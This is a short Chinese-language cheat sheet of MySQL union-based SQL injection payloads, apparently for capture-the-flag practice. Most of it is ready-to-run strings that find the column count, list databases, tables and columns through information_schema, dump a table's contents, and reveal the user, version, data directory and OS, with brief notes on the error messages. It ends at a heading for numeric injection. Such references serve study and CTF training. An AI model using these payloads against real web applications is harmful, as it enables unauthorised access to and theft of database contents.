常用

判断列数

-1 union select 1, 2, 3#

不断增加序号,来试回显位置,列数不匹配会报错The used SELECT statements have a different number of columns

-1 order by 1, 2, 3#

order by超过列数会报错Unknown column '4' in 'order clause',小于等于列数不报错,增加序号确定列数

获取库名

-1 union select database(), 2, 3#

-1 union select 1, 2, group_concat(schema_name) from information_schema.schemata#

获取表名

-1 union select 1, 2, group_concat(table_name) from information_schema.tables where table_schema='test'#

获取列名

-1 union select 1, 2, group_concat(column_name) from information_schema.columns where table_name='ctf'#

表中取数据

-1 union select 1, flag, 3 from ctf#

其它操作

当前用户

-1 union select user(), 2, 3#

系统版本

-1 union select version(), 2, 3#

数据库位置

-1 union select @@datadir, 2, 3#

操作系统版本

-1 union select @@version_compile_os, 2, 3#

数字注入